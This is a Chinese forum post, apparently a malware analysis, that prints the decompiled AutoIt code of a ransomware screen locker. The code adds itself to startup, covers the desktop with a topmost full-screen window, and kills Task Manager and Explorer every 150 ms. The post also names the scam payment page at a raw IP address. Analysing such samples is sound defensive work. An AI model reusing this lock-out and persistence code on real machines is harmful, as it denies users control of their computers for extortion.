本帖最后由 chenc4 于 2012-7-2 19:27 编辑
Autoit写的?反了它~
锁屏部分代码如下:
- $SHELL = REGREAD ( "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" , "Shell" )
- IF $SHELL <> @SCRIPTFULLPATH THEN
- FILECREATESHORTCUT ( @SCRIPTFULLPATH , @STARTUPDIR & "" & @SCRIPTNAME & ".lnk" )
- ENDIF
- $OIE = OBJCREATE ( "Shell.Explorer.2" )
- $HGUI = GUICREATE ( "" , @DESKTOPWIDTH , @DESKTOPHEIGHT , 0 , 0 , $WS_POPUP + $WS_EX_TOOLWINDOW , $WS_EX_LAYERED + $WS_EX_TOPMOST + $WS_EX_TOOLWINDOW )
- WHILE 1
- $DIFF = TIMERDIFF ( $TIMER )
- IF $DIFF > 150 THEN
- IF PROCESSEXISTS ( "taskmgr.exe" ) THEN
- PROCESSCLOSE ( "taskmgr.exe" )
- ENDIF
- IF PROCESSEXISTS ( "explorer.exe" ) THEN
- RUN ( @COMSPEC & " /c " & "taskkill /f /im explorer.exe" , "" , @SW_HIDE )
- ENDIF
- $DIFF = 0
- $TIMER = TIMERINIT ( )
- ENDIF
- WINSETONTOP ( $HGUI , "" , 1 )
- WINACTIVATE ( $HGUI )
- WEND
复制代码
简而言之就是每150ms检测一下任务管理器和explorer进程在不在,在的话就杀掉,所以任务管理器也掉不出来,桌面也显示不出来了,还把自己加到启动项里。另外还创建一个和桌面一样大的控件来覆盖住桌面,恶心啊
另外貌似还开了一个IE进程,访问http://95.172.154.96/spielberg/start.php. 从页面上看,说是因为下载了盗版音乐触犯了版权法,要交50欧元才能解锁电脑。 钓鱼网站啊。。 |